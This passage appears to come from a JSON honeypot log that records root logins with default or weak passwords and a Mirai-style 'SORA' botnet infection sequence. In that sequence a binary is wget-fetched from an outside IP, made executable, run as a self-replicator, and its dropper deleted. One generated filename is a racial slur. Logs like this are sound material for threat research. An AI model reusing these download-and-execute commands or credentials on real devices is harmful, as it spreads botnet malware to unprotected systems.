  2428. "@timestamp": "2018-09-15T04:15:33.674Z",
  2429. "eventid": "command.input",
  2430. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2431. },
  2432. {
  2433. "@timestamp": "2018-09-15T04:15:33.667Z",
  2434. "eventid": "command.input",
  2435. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2436. },
  2437. {
  2438. "@timestamp": "2018-09-15T04:15:33.666Z",
  2439. "eventid": "command.input",
  2440. "input": "sh"
  2441. },
  2442. {
  2443. "@timestamp": "2018-09-15T04:15:33.658Z",
  2444. "eventid": "command.input",
  2445. "input": "shell"
  2446. },
  2447. {
  2448. "@timestamp": "2018-09-15T04:15:33.655Z",
  2449. "eventid": "command.input",
  2450. "input": "system"
  2451. },
  2452. {
  2453. "@timestamp": "2018-09-15T04:15:33.648Z",
  2454. "eventid": "command.input",
  2455. "input": "enable"
  2456. },
  2457. {
  2458. "@timestamp": "2018-09-15T04:15:32.853Z",
  2459. "eventid": "command.input",
  2460. "input": ""
  2461. },
  2462. {
  2463. "@timestamp": "2018-09-15T04:15:31.998Z",
  2464. "eventid": "login.success",
  2465. "geoip": {
  2466. "city_name": "Las Vegas",
  2467. "country_name": "United States"
  2468. },
  2469. "password": "t0talc0ntr0l4!",
  2470. "username": "root"
  2471. }
  2472. ],
  2473. "e986826fc214": [
  2474. {
  2475. "@timestamp": "2018-09-15T04:15:34.877Z",
  2476. "eventid": "command.input",
  2477. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  2478. },
  2479. {
  2480. "@timestamp": "2018-09-15T04:15:34.786Z",
  2481. "eventid": "command.input",
  2482. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  2483. },
  2484. {
  2485. "@timestamp": "2018-09-15T04:15:34.418Z",
  2486. "eventid": "command.input",
  2487. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2488. },
  2489. {
  2490. "@timestamp": "2018-09-15T04:15:34.324Z",
  2491. "eventid": "command.input",
  2492. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  2493. },
  2494. {
  2495. "@timestamp": "2018-09-15T04:15:34.182Z",
  2496. "eventid": "command.input",
  2497. "input": "/bin/busybox SORA"
  2498. },
  2499. {
  2500. "@timestamp": "2018-09-15T04:15:34.094Z",
  2501. "eventid": "command.input",
  2502. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  2503. },
  2504. {
  2505. "@timestamp": "2018-09-15T04:15:33.993Z",
  2506. "eventid": "command.input",
  2507. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2508. },
  2509. {
  2510. "@timestamp": "2018-09-15T04:15:33.984Z",
  2511. "eventid": "command.input",
  2512. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  2513. },
  2514. {
  2515. "@timestamp": "2018-09-15T04:15:33.982Z",
  2516. "eventid": "command.input",
  2517. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  2518. },
  2519. {
  2520. "@timestamp": "2018-09-15T04:15:33.974Z",
  2521. "eventid": "command.input",
  2522. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  2523. },
  2524. {
  2525. "@timestamp": "2018-09-15T04:15:33.972Z",
  2526. "eventid": "command.input",
  2527. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  2528. },
  2529. {
  2530. "@timestamp": "2018-09-15T04:15:33.965Z",
  2531. "eventid": "command.input",
  2532. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  2533. },
  2534. {
  2535. "@timestamp": "2018-09-15T04:15:33.963Z",
  2536. "eventid": "command.input",
  2537. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  2538. },
  2539. {
  2540. "@timestamp": "2018-09-15T04:15:33.955Z",
  2541. "eventid": "command.input",
  2542. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  2543. },
  2544. {
  2545. "@timestamp": "2018-09-15T04:15:33.953Z",
  2546. "eventid": "command.input",
  2547. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  2548. },
  2549. {
  2550. "@timestamp": "2018-09-15T04:15:33.945Z",
  2551. "eventid": "command.input",
  2552. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  2553. },
  2554. {
  2555. "@timestamp": "2018-09-15T04:15:33.942Z",
  2556. "eventid": "command.input",
  2557. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  2558. },
  2559. {
  2560. "@timestamp": "2018-09-15T04:15:33.934Z",
  2561. "eventid": "command.input",
  2562. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  2563. },
  2564. {
  2565. "@timestamp": "2018-09-15T04:15:33.933Z",
  2566. "eventid": "command.input",
  2567. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2568. },
  2569. {
  2570. "@timestamp": "2018-09-15T04:15:33.925Z",
  2571. "eventid": "command.input",
  2572. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2573. },
  2574. {
  2575. "@timestamp": "2018-09-15T04:15:33.924Z",
  2576. "eventid": "command.input",
  2577. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2578. },
  2579. {
  2580. "@timestamp": "2018-09-15T04:15:33.916Z",
  2581. "eventid": "command.input",
  2582. "input": "sh"
  2583. },
  2584. {
  2585. "@timestamp": "2018-09-15T04:15:33.914Z",
  2586. "eventid": "command.input",
  2587. "input": "shell"
  2588. },
  2589. {
  2590. "@timestamp": "2018-09-15T04:15:33.912Z",
  2591. "eventid": "command.input",
  2592. "input": "system"
  2593. },
  2594. {
  2595. "@timestamp": "2018-09-15T04:15:33.824Z",
  2596. "eventid": "command.input",
  2597. "input": "enable"
  2598. },
  2599. {
  2600. "@timestamp": "2018-09-15T04:15:33.647Z",
  2601. "eventid": "command.input",
  2602. "input": ""
  2603. },
  2604. {
  2605. "@timestamp": "2018-09-15T04:15:32.860Z",
  2606. "eventid": "login.success",
  2607. "geoip": {
  2608. "city_name": "Las Vegas",
  2609. "country_name": "United States"
  2610. },
  2611. "password": "default",
  2612. "username": "root"
  2613. }
  2614. ],
  2615. "faec9c00af69": [
  2616. {
  2617. "@timestamp": "2018-09-15T04:13:35.489Z",
  2618. "eventid": "command.input",
  2619. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  2620. },
  2621. {
  2622. "@timestamp": "2018-09-15T04:13:35.354Z",
  2623. "eventid": "command.input",
  2624. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  2625. },
  2626. {
  2627. "@timestamp": "2018-09-15T04:13:34.834Z",
  2628. "eventid": "command.input",
  2629. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2630. },
  2631. {
  2632. "@timestamp": "2018-09-15T04:13:34.699Z",
  2633. "eventid": "command.input",
  2634. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  2635. },
  2636. {
  2637. "@timestamp": "2018-09-15T04:13:34.571Z",
  2638. "eventid": "command.input",
  2639. "input": "/bin/busybox SORA"
  2640. },
  2641. {
  2642. "@timestamp": "2018-09-15T04:13:34.435Z",
  2643. "eventid": "command.input",
  2644. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  2645. },
  2646. {
  2647. "@timestamp": "2018-09-15T04:13:34.303Z",
  2648. "eventid": "command.input",
  2649. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2650. },
  2651. {
  2652. "@timestamp": "2018-09-15T04:13:34.294Z",
  2653. "eventid": "command.input",
  2654. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  2655. },
  2656. {
  2657. "@timestamp": "2018-09-15T04:13:34.286Z",
  2658. "eventid": "command.input",
  2659. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  2660. },
  2661. {
  2662. "@timestamp": "2018-09-15T04:13:34.285Z",
  2663. "eventid": "command.input",
  2664. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  2665. },
  2666. {
  2667. "@timestamp": "2018-09-15T04:13:34.277Z",
  2668. "eventid": "command.input",
  2669. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  2670. },
  2671. {
  2672. "@timestamp": "2018-09-15T04:13:34.275Z",
  2673. "eventid": "command.input",
  2674. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  2675. },
  2676. {
  2677. "@timestamp": "2018-09-15T04:13:34.267Z",
  2678. "eventid": "command.input",
  2679. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  2680. },
  2681. {
  2682. "@timestamp": "2018-09-15T04:13:34.265Z",
  2683. "eventid": "command.input",
  2684. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  2685. },
  2686. {
  2687. "@timestamp": "2018-09-15T04:13:34.257Z",
  2688. "eventid": "command.input",
  2689. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  2690. },
  2691. {
  2692. "@timestamp": "2018-09-15T04:13:34.256Z",
  2693. "eventid": "command.input",
  2694. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  2695. },
  2696. {
  2697. "@timestamp": "2018-09-15T04:13:34.254Z",
  2698. "eventid": "command.input",
  2699. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  2700. },
  2701. {
  2702. "@timestamp": "2018-09-15T04:13:34.246Z",
  2703. "eventid": "command.input",
  2704. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  2705. },
  2706. {
  2707. "@timestamp": "2018-09-15T04:13:34.243Z",
  2708. "eventid": "command.input",
  2709. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2710. },
  2711. {
  2712. "@timestamp": "2018-09-15T04:13:34.236Z",
  2713. "eventid": "command.input",
  2714. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2715. },
  2716. {
  2717. "@timestamp": "2018-09-15T04:13:34.234Z",
  2718. "eventid": "command.input",
  2719. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2720. },
  2721. {
  2722. "@timestamp": "2018-09-15T04:13:34.227Z",
  2723. "eventid": "command.input",
  2724. "input": "sh"
  2725. },
  2726. {
  2727. "@timestamp": "2018-09-15T04:13:34.225Z",
  2728. "eventid": "command.input",
  2729. "input": "shell"
  2730. },
  2731. {
  2732. "@timestamp": "2018-09-15T04:13:34.223Z",
  2733. "eventid": "command.input",
  2734. "input": "system"
  2735. },
  2736. {
  2737. "@timestamp": "2018-09-15T04:13:34.101Z",
  2738. "eventid": "command.input",
  2739. "input": "enable"
  2740. },
  2741. {
  2742. "@timestamp": "2018-09-15T04:13:33.974Z",
  2743. "eventid": "command.input",
  2744. "input": ""
  2745. },
  2746. {
  2747. "@timestamp": "2018-09-15T04:13:32.470Z",
  2748. "eventid": "login.success",
  2749. "geoip": {
  2750. "city_name": "Las Vegas",
  2751. "country_name": "United States"
  2752. },
  2753. "password": "default",
  2754. "username": "root"
  2755. }
  2756. ]
  2757. }
  2758. }